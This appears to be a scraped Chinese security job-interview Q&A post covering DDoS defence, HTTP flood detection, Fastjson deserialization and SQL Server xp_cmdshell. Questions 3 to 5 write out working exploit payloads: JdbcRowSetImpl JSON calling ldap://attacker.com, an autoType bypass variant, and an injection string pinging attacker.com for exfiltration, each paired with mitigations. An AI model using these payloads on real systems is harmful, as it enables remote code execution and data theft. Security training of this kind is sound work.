奇安信二面

《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CN

5000篇网安资料库https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f414475e&chksm=c0e4732df793fa3bf39a6eab17cc0ed0fca5f0e4c979ce64bd112762def9ee7cf0112a7e76af&scene=21#wechat_redirect

上难度

问题1

设计抗DDoS方案时,如何在网络层、传输层、应用层分别部署防护?各列举2项关键技术。

答案

  • 网络层:BGP AnyCast分流、SYN Cookie防御

  • 传输层:TCP速率限制、连接状态检测(如FIN包验证)

  • 应用层:JavaScript Challenge、行为分析(如鼠标移动频率)

问题2

如何通过Nginx日志分析识别HTTP Flood攻击?给出至少3个关键指标及对应阈值设置逻辑。

答案

  1. 请求频率:单IP > 1000次/分钟(基线动态调整)

  2. User-Aent分布:异常集中(如90%请求使用相同UA)

  3. URL熵值 :大量随机路径请求(如/asdf1234

  4. 响应码比例:高比例404/400(扫描特征)

问题3

分析Fastjson 1.2.24反序列化漏洞利用条件,给出利用JdbcRowSetImpl的完整Payload及修复方案。

答案

  • Payload

    {
    "@type":"com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName":"ldap://attacker.com/Exploit",
    "autoCommit":true
    }

  • 修复

    1. 升级至1.2.25+并启用safeMode

    2. 配置ParserConfig.getGlobalInstance().addDeny("com.sun.rowset")

问题4

Fastjson 1.2.68修补了AutoType绕过漏洞,请解释攻击者如何通过异常抛出机制绕过黑名单检测。

答案

  • 绕过原理

    1. 利用java.lang.Exception子类中的@type字段触发反序列化

    2. 异常类加载时绕过checkAutoType()检查

  • Payload示例

    {
    "@type":"java.lang.Exception",
    "@type":"com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName":"ldap://attacker.com/exp",
    "autoCommit":true
    }

问题5

某系统允许通过SQL语句调用存储过程,如何利用xp_cmdshell实现RCE?说明防御的多层方案。

答案

  • 攻击步骤

    1. 注入语句:'; EXEC master..xp_cmdshell 'ping attacker.com'--

    2. 通过DNS或ICMP外带数据

  • 防御方案

    1. 数据库层:禁用xp_cmdshell、最小权限运行

    2. 应用层:输入过滤(如禁用EXEC关键字)

    3. 网络层:出站流量监控

问题

设计抗DDoS方案时,如何保障核心业务在500Gbps流量攻击下的可用性?需包含架构设计及应急响应流程。

答案

  • 架构设计

    1. 流量清洗中心:AnyCast+GRE隧道引流

    2. 多CDN动态调度(如Cloudflare+Akamai)

    3. 业务降级:静态页面回退、非核心服务限流

  • 应急流程

    1. 实时监控触发阈值(如95%带宽占用)

    2. 自动切换至清洗中心

    3. 人工分析攻击特征更新防护规则

相关推荐
yenggd1 天前
华为bgp路由的各种控制和团体属性及orf使用案例
网络·华为
未来之窗软件服务1 天前
操作系统应用开发(十一)RustDesk在线编译自己客户端——东方仙盟筑基期
网络·远程桌面·rustdesk·仙盟创梦ide·东方仙盟
北京耐用通信1 天前
协议不通,数据何通?耐达讯自动化Modbus TCP与Profibus网关技术破解建筑自动化最大瓶颈
网络·人工智能·网络协议·自动化·信息与通信
fei_sun1 天前
【复习】计网每日一题--多播
网络
你好,赵志伟1 天前
传输层协议 TCP
网络·网络协议·tcp/ip
茯苓gao1 天前
CAN总线学习(四)错误处理 STM32CAN外设一
网络·笔记·stm32·单片机·学习
从零开始的ops生活1 天前
【Day 68】Zabbix-自动监控-Web检测-分布式监控
linux·网络·zabbix
遗憾随她而去.1 天前
Uni-App 页面跳转监控实战:快速定位路由问题
前端·网络·uni-app
小胖西瓜1 天前
[解决方案] 回顾一下业务中的网络技术演化
网络
jun~1 天前
SQLMap数据库枚举靶机(打靶记录)
linux·数据库·笔记·学习·安全·web安全